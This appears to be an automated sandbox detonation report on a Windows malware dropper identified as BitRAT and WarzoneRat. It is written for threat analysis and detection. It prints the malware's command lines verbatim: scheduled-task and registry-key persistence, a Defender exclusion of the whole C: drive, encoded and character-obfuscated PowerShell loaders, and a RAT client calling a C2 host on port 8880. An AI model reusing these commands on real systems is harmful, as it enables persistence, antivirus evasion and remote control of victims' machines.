C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {A99EE01B-E8FC-40AC-BFAA-FB04EFD10345} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "781834726-469034446389577595-1944380462-2039113711-55127832512762804791238524382"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0xc4

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{28133f46-3ead-466c-9f65-412012f4dd54}

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath C:\

C:\ProgramData\$77images.exe

"C:\ProgramData\$77images.exe"

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{900f862d-3775-444b-a619-2e15ccffe35b}

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

Network

Country | Destination | Domain | Proto
N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp
N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp
N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2022-12-15 13:24

Reported

2022-12-15 13:27

Platform

win10v2004-20220901-en

Max time kernel

27s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"

Signatures

BitRAT

trojan bitrat

WarzoneRat, AveMaria

rat infostealer warzonerat

Modifies Installed Components in the registry

persistence

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name渀" C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\GoogleUpdate.dll C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "888" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "10524" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = [binary data omitted] C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "10524" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "10524" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "888" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = [binary data omitted]
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
